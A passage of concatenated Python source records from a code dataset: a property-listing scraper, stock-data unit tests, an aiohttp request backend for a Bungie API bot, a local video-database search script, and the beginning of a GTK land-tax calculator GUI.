property[\"Price\"] = ''.join(filter(str.isdigit, property[\"Price\"]))\n if property[\"Price\"] == \"\":\n property[\"Price\"] = \"0\"\n except:\n property[\"Price\"] = \"0\"\n\n property[\"Address\"]=item.find_all(\"a\", {\"class\":\"listing-results-address\"})[0].text\n\n try:\n property[\"Beds\"]=item.find(\"span\", {\"class\":\"num-icon num-beds\"}).text\n except:\n property[\"Beds\"]=\"0\"\n try:\n property[\"Bathrooms\"]=item.find(\"span\", {\"class\":\"num-icon num-baths\"}).text\n except:\n property[\"Bathrooms\"]=\"0\"\n try:\n property[\"Reception_rooms\"]=item.find(\"span\", {\"class\":\"num-icon num-reception\"}).text\n except:\n property[\"Reception_rooms\"]=\"0\"\n try:\n property[\"Agent_Name\"]=item.find(\"p\", {\"class\":\"top-half listing-results-marketed\"}).find(\"span\").text\n except:\n property[\"Agent_Name\"]=\"None\"\n try:\n property[\"Agent_tel\"]=item.find(\"span\", {\"class\":\"agent_phone\"}).find(\"span\").text\n except:\n property[\"Agent_tel\"]=\"None\"\n property[\"Website\"] = \"Zoopla\"\n property[\"Acquire_time\"] = str(search_time)\n\n proplist.append(property)\n\nif len(proplist) > 0:\n print (str(len(proplist)) + \" properties found\")\n print (\"On \" + str(numpages) + \" pages\\n\")\n df = pandas.DataFrame(proplist)\n\n try:\n avprice = np.asarray(df[\"Price\"], dtype=np.int).mean()\n print(\"Average Price: \")\n print(avprice)\n print(\"Properties with price not explicitly specified excluded from average\")\n\n with open(\"average_prices.txt\", 'a') as file:\n file.write(f\"\\n{search_time}_Average Price from OTM for properties within {radius} miles of {city}: \" + \"£\" + str(int(avprice)))\n \n except:\n print(\"Cannot calculate average\")\n\n save_prompt = input(\"\\nSave results as spreadsheet? y/n: \")\n\n if \"y\" in save_prompt:\n filename = f\"{search_time}_{city}\"\n df.to_csv(f\"{filename}.csv\")\n print(f\"Saved data in file: '{filename}.csv'\")\n else:\n print(\"No spreadsheet saved\")\n \n print(f\"Saving {len(proplist)} properties to {city.upper()} database...\")\n storage.connect(city)\n\n properties_saved = 0\n properties_existing = 0\n\n for p in proplist: # consider adding tqdm - and removing print statements in storage\n if storage.insert(city, p['Date_Listed'], p['Price'], p['Address'], p['Beds'], p['Bathrooms'], p['Reception_rooms'], p['Agent_Name'], p['Agent_tel'], p['Website'], p['Acquire_time']) == 'new':\n properties_saved += 1\n else:\n properties_existing += 1\n print(f\"Saved {properties_saved} to {city} - {properties_existing} already in database\")\n\n print(\"Saved to DB\")","sub_path":"zoopla_scraper.py","file_name":"zoopla_scraper.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198801881","text":"import datetime\n\nimport pytest\n\nfrom stock_ai import util\nfrom stock_ai.module import StockCN\nfrom test import is_travis\n\n\n@pytest.mark.skipif(is_travis, reason=\"Skipping this test on Travis CI.\")\ndef test_get_info_mongodb():\n \"\"\"测试默认数据\"\"\"\n s = StockCN('601398')\n _test_info(s)\n\n\ndef _test_info(stock: StockCN):\n \"\"\"测试默认数据\"\"\"\n assert stock.code == '601398'\n assert stock.name == '工商银行'\n assert stock.exchange == 'sh'\n assert util.date2str(stock.ipo_date) == '2006-10-27'\n assert isinstance(stock.ipo_date, datetime.datetime)\n\n\ndef test_stockcn_construct():\n \"\"\"测试构造函数\"\"\"\n s = StockCN('601398')\n _test_info(s)\n assert not s.getblock_online\n assert not s.getdaily_online\n assert not s.getinfo_online\n\n\ndef test_get_info_online():\n s = StockCN('601398', getinfo_online=True)\n _test_info(s)\n\n\ndef test_getdaily_online():\n s = StockCN('601398', getdaily_online=True)\n d1 = s.get_daily()\n assert not d1.empty\n d2 = s.get_daily(start='2010-01-04')\n assert d1.iloc[-1].equals(d2.iloc[-1])\n assert not d2.empty\n d3 = s.get_daily(end='2010-01-04')\n assert not d3.empty\n assert d1.iloc[0].equals(d3.iloc[0])\n assert d2.iloc[0].equals(d3.iloc[-1])\n d4 = s.get_daily(start='2010-01-04', end='2010-01-04')\n assert not d4.empty\n d4 = s.get_daily(start='2010-01-01', end='2010-01-01')\n assert d4.empty\n\n\ndef test_getblock_online():\n s = StockCN('601398', getblock_online=is_travis)\n print(s.block)\n assert not s.block.empty\n\n\ndef test_getrelated_codes():\n s = StockCN('601398', getblock_online=is_travis)\n print(s.related_codes)\n assert len(s.related_codes) > 0\n assert '601398' not in s.related_codes\n assert '601939' in s.related_codes\n\n\ndef test_get_sharpe_ratio():\n print(StockCN('601398', getdaily_online=is_travis).get_sharpe_ratio())\n","sub_path":"test/test_stockcn.py","file_name":"test_stockcn.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558593689","text":"import asyncio\nimport logging\nimport random\nfrom typing import Optional, Union\n\nimport aiohttp\nimport aiohttp_client_cache\n\nfrom ElevatorBot.networking.bungieRatelimiting import BungieRateLimiter\nfrom ElevatorBot.networking.models import WebResponse\n\n\n# get logger\nlogger = logging.getLogger(\"network\")\n\n# the limiter object which to not get rate-limited by bungie\nbungie_limiter = BungieRateLimiter()\n\n# how many times to retry a request\nmax_web_request_tries = 10\n\n\nasync def get_request(\n session: Union[aiohttp_client_cache.CachedSession, aiohttp.ClientSession],\n url: str,\n headers: dict = None,\n params: dict = None,\n bungie_request: bool = True,\n) -> WebResponse:\n \"\"\"\n Makes a get request to the specified url\n Returns instance of WebResponse()\n \"\"\"\n\n response = None\n\n # wait for a token from the rate limiter\n if bungie_request:\n async with asyncio.Lock():\n await bungie_limiter.wait_for_token()\n\n # abort after max_web_request_tries tries\n for _ in range(max_web_request_tries):\n try:\n async with session.get(\n url=url,\n headers=headers,\n params=params,\n ) as request:\n response = await handle_request_data(\n request=request,\n url=url,\n )\n\n # try again\n if response is None:\n continue\n\n # return response\n else:\n return response\n\n except (asyncio.exceptions.TimeoutError, ConnectionResetError):\n logger.error(\"Timeout error for '%s'\", url)\n await asyncio.sleep(random.randrange(2, 6))\n continue\n\n # return that it failed\n if response:\n return response\n logger.error(\n \"Request failed '%s' times, aborting for '%s'\", max_web_request_tries, url\n )\n no_response = WebResponse(\n content=None,\n status=None,\n )\n no_response.error_message = \"Request failed\"\n return no_response\n\n\nasync def post_request(\n session: Union[aiohttp_client_cache.CachedSession, aiohttp.ClientSession],\n url: str,\n data: dict,\n headers: dict = None,\n params: dict = None,\n bungie_request: bool = True,\n) -> WebResponse:\n \"\"\"\n Makes a post request to the specified url\n Returns instance of WebResponse()\n \"\"\"\n\n response = None\n\n # wait for a token from the rate limiter\n if bungie_request:\n async with asyncio.Lock():\n await bungie_limiter.wait_for_token()\n\n # abort after max_web_request_tries tries\n for _ in range(max_web_request_tries):\n try:\n async with session.post(\n url=url,\n data=data,\n headers=headers,\n params=params,\n allow_redirects=False,\n ) as request:\n response = await handle_request_data(\n request=request,\n url=url,\n )\n\n # try again\n if response is None:\n continue\n\n # return response\n else:\n return response\n\n except (asyncio.exceptions.TimeoutError, ConnectionResetError):\n logger.error(\"Timeout error for '%s'\", url)\n await asyncio.sleep(random.randrange(2, 6))\n continue\n\n # return that it failed\n if response:\n return response\n logger.error(\n \"Request failed '%s' times, aborting for '%s'\", max_web_request_tries, url\n )\n no_response = WebResponse(\n content=None,\n status=None,\n )\n no_response.error_message = \"Request failed\"\n return no_response\n\n\nasync def handle_request_data(\n request: Union[aiohttp.ClientResponse, aiohttp_client_cache.CachedResponse],\n url: str,\n) -> Optional[WebResponse]:\n \"\"\"\n Handle the request results\n \"\"\"\n\n # make sure the return is a json, sometimes we get a http file for some reason\n if \"application/json\" not in request.headers[\"Content-Type\"]:\n logger.error(\n \"'%s': Wrong content type '%s' with reason '%s' for '%s'\",\n request.status,\n request.headers[\"Content-Type\"],\n request.reason,\n url,\n )\n if request.status == 200:\n logger.error(\"Wrong content type returned text: '%s'\", await request.text())\n await asyncio.sleep(3)\n return\n\n # get the response as a json\n try:\n response = WebResponse(\n content=await request.json(),\n status=request.status,\n )\n\n # set the error vars\n response.error = None\n if \"ErrorStatus\" in response.content:\n response.error = response.content[\"ErrorStatus\"]\n elif \"error_description\" in response.content:\n response.error = response.content[\"error_description\"]\n response.error_code = (\n response.content[\"ErrorCode\"] if \"ErrorCode\" in response.content else None\n )\n response.error_message = (\n response.content[\"Message\"] if \"Message\" in response.content else None\n )\n\n # set if the response was cached\n try:\n response.from_cache = request.from_cache\n except AttributeError:\n response.from_cache = False\n\n except aiohttp.ClientPayloadError:\n logger.error(\"'%s': Payload error, retrying for '%s'\", request.status, url)\n return\n except aiohttp.ContentTypeError:\n logger.error(\"'%s': Content type error, retrying for '%s'\", request.status, url)\n return\n\n # if response is ok return it\n if response.status == 200:\n response.success = True\n return response\n\n # handling any errors if not ok\n stop_loop_due_to_error = await handle_bungie_errors(\n url=url,\n response=response,\n )\n if stop_loop_due_to_error:\n return response\n\n\nasync def handle_bungie_errors(url: str, response: WebResponse) -> bool:\n \"\"\"\n Looks for typical bungie errors and handles / logs them\n Returns: if_loop_should_be_stopped: bool\n \"\"\"\n\n # generic bad request, such as wrong format\n if response.status == 400:\n logger.error(\n \"'%s - %s': Generic bad request for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # not found\n elif response.status == 404:\n logger.error(\n \"'%s - %s': No stats found for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # bungie is ded\n elif response.status == 503:\n logger.error(\n \"'%s - %s': Server is overloaded for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(10)\n\n # rate limited\n elif response.status == 429:\n logger.warning(\n \"'%s - %s': Getting rate limited for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(2)\n\n # we we are getting throttled\n elif (\n response.error == \"PerEndpointRequestThrottleExceeded\"\n or response.error == \"DestinyDirectBabelClientTimeout\"\n ):\n logger.warning(\n \"'%s - %s': Getting throttled for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n\n throttle_seconds = response.content[\"ErrorStatus\"][\"ThrottleSeconds\"]\n\n await asyncio.sleep(throttle_seconds + random.randrange(1, 3))\n\n # if user doesn't have that item\n elif response.error == \"DestinyItemNotFound\":\n logger.error(\n \"'%s - %s': User doesn't have that item for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # private profile\n elif response.error == \"DestinyPrivacyRestriction\":\n logger.error(\n \"'%s - %s': User has private Profile for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # timeout\n elif response.error == \"DestinyDirectBabelClientTimeout\":\n logger.warning(\n \"'%s - %s': Getting timeouts for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(60)\n\n # user has disallowed clan invites\n elif response.error == \"ClanTargetDisallowsInvites\":\n logger.error(\n \"'%s - %s': User disallows clan invites '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # user has disallowed clan invites\n elif response.error == \"AuthorizationRecordRevoked\":\n logger.error(\n \"'%s - %s': User refresh token is outdated and they need to re-register for '%s' - '%s'\",\n response.status,\n response,\n url,\n response.error_message,\n )\n return True\n\n else:\n logger.error(\n \"'%s - %s': Request failed for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(2)\n\n return False\n","sub_path":"ElevatorBot/networking/networkBackend.py","file_name":"networkBackend.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"143452285","text":"__author__ = 'YJ'\n# -*- coding: UTF-8 -*-\nimport os\nimport os.path\nimport configparser\n\nfrom AV import *\nfrom Report import *\n\nhost = 'localhost'\nuser = 'root'\npasswd = '123456'\ndatabase = 'javlibrary'\ndb = Mysql(host, user, passwd, database)\n# 读取上次的网址\n\n\ndef get_option():\n cf = configparser.ConfigParser()\n cf.read('conf.ini')\n last_url = cf.get('last time', 'url')\n last_actor = cf.get('last time', 'actor')\n url = input('请输入影片目录第一页的地址(默认为上次: %s):\\n' % last_url)\n rebuild_flag = False\n if url == '':\n url = last_url\n elif url != last_url:\n rebuild_flag = True\n cf.set('last time', 'url', url)\n search_method = input('请选择搜索方式: 1.按演员 2.按分数(默认为1): ')\n if search_method == '':\n search_method = '1'\n if search_method == '1':\n actor = input('请输入要搜索谁的作品(默认为上次:%s): ' % last_actor)\n if actor == '':\n actor = last_actor\n elif actor != last_actor:\n cf.set('last time', 'actor', actor)\n cf.write(open('conf.ini', 'w'))\n return url, search_method, actor, None, rebuild_flag\n if search_method == '2':\n min_score = input('请输入最低分数(默认8.5): ')\n if min_score == '':\n min_score = 8.5\n return url, search_method, None, min_score, rebuild_flag\n\n\ndef rebuild_data():\n spider = Spider()\n spider.get_catalog_pages(url)\n catalog_pages = db.select_all_catalog_pages()\n for catalog_page in catalog_pages:\n analyst = Analyst(str(catalog_page))\n video_links = analyst.get_video_list()\n for video in video_links:\n video_exits = db.select_video(video)\n if not video_exits:\n video_content = spider.get_detail_page(video)\n if video_content:\n analyst = Analyst(video_content)\n video_details = analyst.get_video_details()\n db.save_video(video_details)\n\n\nif __name__ == '__main__':\n result_list = []\n url, search_method, actor, min_score, rebuild_flag = get_option()\n # if True:\n if rebuild_flag:\n rebuild_data()\n\n catalog_pages = db.select_all_catalog_pages()\n for catalog_page in catalog_pages:\n analyst = Analyst(str(catalog_page))\n video_links = analyst.get_video_list()\n for video in video_links:\n video_exits = db.select_video(video)\n if video_exits:\n video_details = {'title': video_exits[1], 'actor': video_exits[2], 'score': video_exits[3],\n 'link': video_exits[4], 'search': video_exits[5], 'cover': video_exits[6]}\n if search_method == '1':\n if Searcher(video_details).by_actor(actor):\n result_list.append(video_details)\n\n if search_method == '2':\n if Searcher(video_details).by_score(min_score):\n result_list.append(video_details)\n\n result_list = sorted(result_list, key=lambda i: i['score'], reverse=True)\n\n Report(result_list)\n os.system(r'start report.html')\n","sub_path":"Explorer.py","file_name":"Explorer.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"318368271","text":"from gi.repository import Gtk, GdkPixbuf, Pango\nfrom ui_xml import ui_xml\n\nimport re\n\nINT_MAX = 2147483647\n\nclass ReWindow(Gtk.Window):\n\n\tdef __init__(self):\n\t\t# __init__ is build \"layer-by-layer\" according to layout map:\n\n\t\t\"\"\"\n\t\tApplication GUI layout map:\n\n\t\t0\t1\t2\t3\t4\t5\t6\t7\n\t\tReWindow\n\t\t\tPaned (global_paned)\n\t\t\t\tBox(3) (edit_box)\n\t\t\t\t\tMenuBar (edit_menubar)\n\t\t\t\t\tToolbar (edit_toolbar)\n\t\t\t\t\tPaned (edit_paned)\n\t\t\t\t\t\tNotebook(2) (edit_notebook)\n\t\t\t\t\t\t\tScrolledWindow (wordpad_scroller)\n\t\t\t\t\t\t\t\tTextView (wordpad)\n\t\t\t\t\t\t\tBox(2) (ssheet_box)\n\t\t\t\t\t\t\t\tScrolledWindow (ssheet_scroller)\n\t\t\t\t\t\t\t\t\tTreeView (ssheet)\n\t\t\t\t\t\t\t\tToolbar (ssheet_toolbar)\n\t\t\t\t\t\tScrolledWindow (report_scroller)\n\t\t\t\t\t\t\tTextView (report)\n\t\t\t\tBox(2) (error_box)\n\t\t\t\t\tToolbar (error_toolbar)\n\t\t\t\t\tScrolledWindow (error_scroller)\n\t\t\t\t\t\tTextView (error)\n\t\t\"\"\"\n\n\n\n\t\t# Level 0:\n\t\tGtk.Window.__init__(self)\n\t\tself.set_title('Land-tax Calculator')\n\t\tself.set_default_size(1200, 650)\n\n\t\tui_manager = Gtk.UIManager()\n\t\tui_manager.add_ui_from_string(ui_xml)\n\n\t\taction_group = Gtk.ActionGroup('Actions')\n\t\tself.build_tooltips_dict()\n\t\tself.append_edit_menubar_actions(action_group)\n\t\tself.append_edit_toolbar_actions(action_group)\n\t\tself.append_ssheet_toolbar_actions(action_group)\n\t\tself.append_error_toolbar_actions(action_group)\n\t\tui_manager.insert_action_group(action_group)\n\n\t\tfont = Pango.FontDescription('DejaVu Sans Mono Book 10')\n\n\n\n\t\t# Level 1:\n\t\tself.global_paned = Gtk.Paned()\n\t\tself.global_paned.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.add(self.global_paned)\n\n\n\n\t\t# Level 2:\n\t\tself.edit_box = Gtk.Box()\n\t\tself.edit_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.global_paned.pack1(self.edit_box, True, True)\n\n\t\tself.error_box = Gtk.Box()\n\t\tself.error_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.global_paned.pack2(self.error_box, True, True)\n\n\n\n\t\t# Level 3:\n\t\t# edit_box components:\n\t\tself.edit_menubar = ui_manager.get_widget('/MenuBar')\n\t\tself.edit_box.pack_start(self.edit_menubar, False, False, 0)\n\n\t\tself.edit_toolbar = ui_manager.get_widget('/EditToolbar')\n\t\tself.edit_box.pack_start(self.edit_toolbar, False, False, 0)\n\n\t\ticon_theme = Gtk.IconTheme.get_default()\n\n\t\tself.edit_toolbar.get_nth_item(6).set_icon_name('x-office-document')\n\t\tself.edit_toolbar.get_nth_item(7).set_icon_name('x-office-spreadsheet')\n\t\tself.edit_toolbar.get_nth_item(9).set_icon_name('x-office-presentation')\n\n\t\tself.edit_paned = Gtk.Paned()\n\t\tself.edit_paned.set_orientation(Gtk.Orientation.HORIZONTAL)\n\t\tself.edit_box.pack_start(self.edit_paned, True, True, 0)\n\n\n\t\t# error_box components:\n\t\tself.error_toolbar = ui_manager.get_widget('/ErrorToolbar')\n\t\tself.error_box.pack_start(self.error_toolbar, False, False, 0)\n\n\t\tself.error_scroller = Gtk.ScrolledWindow()\n\t\tself.error_box.pack_start(self.error_scroller, True, True, 0)\n\n\n\n\t\t# Level 4:\n\t\t# edit_paned components:\n\t\tself.edit_notebook = Gtk.Notebook()\n\t\tself.edit_notebook.set_property('show-tabs', False)\n\t\tself.edit_paned.pack1(self.edit_notebook, True, True)\n\n\t\tself.report_scroller = Gtk.ScrolledWindow()\n\t\tself.edit_paned.pack2(self.report_scroller, True, True)\n\n\n\t\t# error_scroller components:\n\t\tself.error = Gtk.TextView()\n\t\tself.error.modify_font(font)\n\t\tself.text_view_apply_ro(self.error)\n\t\tself.error_scroller.add(self.error)\n\n\n\n\t\t# Level 5:\n\t\t# edit_notebook components:\n\t\tself.wordpad_scroller = Gtk.ScrolledWindow()\n\t\tself.edit_notebook.append_page(self.wordpad_scroller, Gtk.Label('Wordpad'))\n\n\t\tself.ssheet_box = Gtk.Box()\n\t\tself.ssheet_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.edit_notebook.append_page(self.ssheet_box, Gtk.Label('Spreadsheet'))\n\n\n\t\t# report_scroller components:\n\t\tself.report = Gtk.TextView()\n\t\tself.report.modify_font(font)\n\t\tself.text_view_apply_ro(self.report)\n\t\tself.report_scroller.add(self.report)\n\n\n\n\t\t# Level 6:\n\t\t# wordpad_scroller components:\n\t\tself.wordpad = Gtk.TextView()\n\t\tself.wordpad.modify_font(font)\n\t\tself.wordpad_scroller.add(self.wordpad)\n\n\t\t# ssheet_box components:\n\t\tself.ssheet_scroller = Gtk.ScrolledWindow()\n\t\tself.ssheet_box.pack_start(self.ssheet_scroller, True, True, 0)\n\n\t\tself.ssheet_toolbar = ui_manager.get_widget('/SSheetToolbar')\n\t\tself.ssheet_box.pack_start(self.ssheet_toolbar, False, False, 0)\n\n\n\n\t\t# Level 7:\n\t\t# ssheet_box components:\n\t\tself.liststore = Gtk.ListStore(int, int, int, int)\n\t\tself.liststore.append([54645647, 3, 33, 90])\n\t\tself.liststore.append([74894866, 1, 12, 22])\n\n\t\tself.ssheet = Gtk.TreeView(model = self.liststore)\n\n\t\tssheet_renderers = [\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText()\n\t\t\t]\n\t\tssheet_handlers = [\n\t\t\tself.tree_view_edited_id,\n\t\t\tself.tree_view_edited_type,\n\t\t\tself.tree_view_edited_width,\n\t\t\tself.tree_view_edited_heights\n\t\t\t]\n\t\tfor i in range(4):\n\t\t\tssheet_renderers[i].connect('edited', ssheet_handlers[i])\n\t\tfor i in ssheet_renderers:\n\t\t\ti.set_property('editable', True)\n\n\t\tssheet_columns = [\n\t\t\tGtk.TreeViewColumn('#', ssheet_renderers[0], text=0),\n\t\t\tGtk.TreeViewColumn('Type', ssheet_renderers[1], text=1),\n\t\t\tGtk.TreeViewColumn('Width', ssheet_renderers[2], text=2),\n\t\t\tGtk.TreeViewColumn('Heights', ssheet_renderers[3], text=3)\n\t\t\t]\n\t\tssheet_columns[0].set_property('min-width', 150)\n\t\tssheet_columns[1].set_property('min-width', 80)\n\t\tssheet_columns[2].set_property('min-width', 100)\n\t\tssheet_columns[3].set_property('min-width', 100)\t\t\n\t\tfor i in ssheet_columns:\n\t\t\ti.set_property('resizable', True)\n\t\t\ti.set_property('reorderable', True)\n\t\t\tself.ssheet.append_column(i)\n\n\t\tself.ssheet_scroller.add(self.ssheet)\n\n\n\t\tself.clear()\n\t\tself.apply_handlers()\n\t\tself.built_errors_dict()\n\n\n\n\tdef build_tooltips_dict(self):\n\t\tself.tooltips = {\n\t\t\t'New'\t\t:\t'Create new file',\n\t\t\t'Open'\t\t:\t'Open existing file',\n\t\t\t'Save'\t\t:\t'Save current file',\n\t\t\t'RepSave'\t:\t'Save report-file',\n\t\t\t'Add'\t\t:\t'Add new entry to the spreadsheet',\n\t\t\t'Del'\t\t:\t'Del highlightened entry from the spreadsheet',\n\t\t\t'Wordpad'\t:\t'Switch to \"Wordpad\" mode',\n\t\t\t'SSheet'\t:\t'Switch to \"Spreadsheet\" mode',\n\t\t\t'Report'\t:\t'Enable/Disable \"Report view\" area',\n\t\t\t'ErrClose'\t:\t'Close EГГOГ notification area',\n\t\t\t'Error'\t\t:\t'REMOVE DAT FUKN EГГOГS!'\n\t\t\t}\n\n\tdef append_edit_menubar_actions(self, action_group):\n\t\taction_group.add_action(Gtk.Action(\"Menu_File\", \"File\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('File_New', Gtk.STOCK_NEW, 'New', None, None, self.file_close),\n\t\t\t('File_Open', Gtk.STOCK_OPEN, 'Open...', None, None, self.file_open),\n\t\t\t('File_Save', Gtk.STOCK_SAVE, 'Save', None, None, self.file_save),\n\t\t\t('File_SaveAs', Gtk.STOCK_SAVE, 'Save As...', None, None, self.file_save_as),\n\t\t\t('File_ReportSave', Gtk.STOCK_SAVE, 'Save Report', None, None, self.file_save_report),\n\t\t\t('File_ReportSaveAs', Gtk.STOCK_SAVE, 'Save Report As...', None, None, self.file_save_report_as),\n\t\t\t('File_Close', Gtk.STOCK_DELETE, 'Close', None, None, self.file_close),\n\t\t\t('File_Quit', Gtk.STOCK_QUIT, 'Quit', None, None, self.file_quit)\n\t\t\t])\n\n\t\taction_group.add_action(Gtk.Action(\"Menu_View\", \"View\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('View_WordpadMode', None, '\"Wordpad\" Mode', None, None, self.view_wordpad),\n\t\t\t('View_SSheetMode', None, '\"Spreadsheet\" Mode', None, None, self.view_ssheet),\n\t\t\t('View_ReportSwitch', None, 'Report Area', None, None, self.view_report)\n\t\t\t])\n\n\t\taction_group.add_action(Gtk.Action(\"Menu_Help\", \"Help\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('Help_About', Gtk.STOCK_ABOUT, 'About', None, None, self.help_about)\n\t\t\t])\n\n\tdef append_edit_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbm_New', Gtk.STOCK_NEW, 'New', None, self.tooltips['New'], self.file_new),\n\t\t\t('Tbm_Open', Gtk.STOCK_OPEN, 'Open...', None, self.tooltips['Open'], self.file_open),\n\t\t\t('Tbm_Save', Gtk.STOCK_SAVE, 'Save', None, self.tooltips['Save'], self.file_save),\n\t\t\t('Tbm_ReportSave', Gtk.STOCK_SAVE, 'Save Report', None, self.tooltips['RepSave'], self.file_save_report),\n\t\t\t('Tbm_WordpadMode', None, '\"Wordpad\" Mode', None, self.tooltips['Wordpad'], self.view_wordpad),\n\t\t\t('Tbm_SSheetMode', None, '\"Spreadsheet\" Mode', None, self.tooltips['SSheet'], self.view_ssheet),\n\t\t\t('Tbm_ReportSwitch', None, 'Report Area', None, self.tooltips['Report'], self.view_report)\n\t\t\t])\n\n\tdef append_ssheet_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbs_Add', Gtk.STOCK_ADD, 'Add', None, self.tooltips['Add'], self.tbs_add),\n\t\t\t('Tbs_Del', Gtk.STOCK_DELETE, 'Del', None, self.tooltips['Del'], self.tbs_del)\n\t\t\t])\n\n\tdef append_error_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbe_Close', Gtk.STOCK_DELETE, 'Add', None, self.tooltips['ErrClose'], self.error_close),\n\t\t\t('Tbe_Label', None, 'EГГOГ:', None, self.tooltips['Error'], None)\n\t\t\t])\n\n\n\n\tdef text_view_apply_ro(self, text_view):\n\t\ttext_view.set_property('editable', False)\n\t\ttext_view.set_property('cursor-visible', False)\n\n\n\t# HANDLERS:\n\tdef tree_view_edited_id(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][0] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['IDVal'])\n\n\tdef tree_view_edited_type(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif (x != None and 5 >= x >= 1):\n\t\t\tself.liststore[path][1] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['TypeVal'])\n\n\tdef tree_view_edited_width(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][2] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['WidthVal'])\n\n\tdef tree_view_edited_heights(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][3] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['HeightsVal'])\n\n\n\n\tdef file_new(self, widget):\n\t\tif not self.file_saved:\n\t\t\tresponse = self.unsaved_dialog()\n\n\t\t\tif response == True:\n\t\t\t\tself.file_save(self)\n\t\t\telif response == None:\n\t\t\t\treturn\n\n\t\tself.clear()\n\n\tdef file_open(self, widget):\n\t\tfile_path = self.get_open_file_path()\n\t\tif file_path != None:\n\t\t\tself.clear()\n\t\t\t\n\t\t\tself.file_path = file_path\n\t\t\tself.text_to_liststore( self.read_from_file(self.file_path) )\n\n\t\t\tself.refresh()\n\n\tdef file_save(self, widget):\n\t\tif self.file_path == None:\n\t\t\tself.file_save_as(self)\n\t\telse:\n\t\t\ttext = self.liststore_to_text()\n\t\t\tself.write_to_file(self.file_path, text)\n\n\tdef file_save_as(self, widget):\n\t\tfile_path = self.get_save_file_path()\n\t\tif file_path != None:\n\t\t\tself.file_path = file_path\n\n\t\t\ttext = self.liststore_to_text()\n\t\t\tself.write_to_file(self.file_path, text)\n\n\tdef file_save_report(self, widget):\n\t\tif self.report_path == None:\n\t\t\tself.file_save_report_as(self)\n\t\telse:\n\t\t\ttext = self.report_gen()\n\t\t\tself.write_to_file(self.report_path, text)\n\n\tdef file_save_report_as(self, widget):\n\t\treport_path = self.get_save_file_path()\n\t\tif report_path != None:\n\t\t\tself.report_path = report_path\n\n\t\t\ttext = self.report_gen()\n\t\t\tself.write_to_file(self.report_path, text)\n\n\tdef file_close(self, widget):\n\t\tself.file_new(self)\n\n\tdef file_quit(self, widget):\n\t\tself.file_new(self)\n\t\tself.destroy()\n\n\tdef view_wordpad(self, widget):\n\t\tif (self.edit_notebook.get_current_page() == 0):\n\t\t\treturn\n\n\t\tself.ssheet_box.hide()\n\t\tself.wordpad.show()\n\t\tself.edit_notebook.set_current_page(0)\n\n\t\tself.refresh_wordpad()\n\n\tdef view_ssheet(self, widget):\n\t\tif (self.edit_notebook.get_current_page() == 1):\n\t\t\treturn\n\n\t\tself.ssheet_box.show_all()\n\t\tself.wordpad.hide()\n\t\tself.edit_notebook.set_current_page(1)\n\n\t\tself.reparse_ssheet()\n\n\tdef view_report(self, widget):\n\t\tif not ( self.report_scroller.get_visible() ):\n\t\t\tself.report_scroller.show()\n\t\t\tself.refresh_report()\n\t\telse:\n\t\t\tself.report_scroller.hide()\n\n\tdef help_about(self, widget):\n\t\tself.about_dialog()\n\n\tdef tbs_add(self, widget):\n\t\tself.file_saved = False\n\n\t\tself.liststore.append([1, 1, 1, 1])\n\n\t\tself.refresh_report()\n\n\tdef tbs_del(self, widget):\n\t\tself.file_saved = False\n\n\t\tselection = self.ssheet.get_selection()\n\t\tselected = selection.get_selected()\n\t\tselected[0].remove(selected[1])\n\n\t\tself.refresh_report()\n\n\tdef error_close(self, widget):\n\t\tself.error_hide()\n\n\n\n\tdef liststore_row_changed(self, liststore, path, iter):\n\t\tself.file_saved = False\n\n\t\tself.refresh_report()\n\n\tdef wordpad_buffer_changed(self, buffer):\n\t\tself.file_saved = False\n\n\t\tself.reparse_ssheet()\n\n\n\n\t# HELPERS:\n\tdef clear(self):\n\t\tself.file_path = None\n\t\tself.report_path = None\n\n\t\tself.file_saved = True\n\n\t\tself.report.get_buffer().set_text('')\n\t\tself.wordpad.get_buffer().set_text('')\n\t\tself.liststore.clear()\n\n\tdef 